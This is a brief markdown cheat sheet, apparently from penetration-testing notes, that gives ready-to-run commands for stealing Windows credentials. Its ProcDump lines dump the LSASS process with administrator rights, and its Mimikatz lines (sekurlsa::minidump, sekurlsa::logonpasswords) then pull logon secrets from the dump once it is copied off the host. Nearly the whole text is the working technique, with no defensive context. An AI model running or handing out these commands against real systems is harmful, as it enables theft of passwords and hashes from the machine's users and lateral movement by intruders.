# LSASS DUMP

ProcDump - <https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>

Run `procdump.exe` with **LOCAL ADMINISTRATOR PRIVILEGE** to dump **LSASS.exe** process

```powershell
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```

```powershell
.\procdump.exe -r -ma lsass.exe lsass.dmp
```

After copying the `lsass.dmp` dump file to local machin, use Mimikatz's minidump to extract secrets

```
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords /all
```

<br>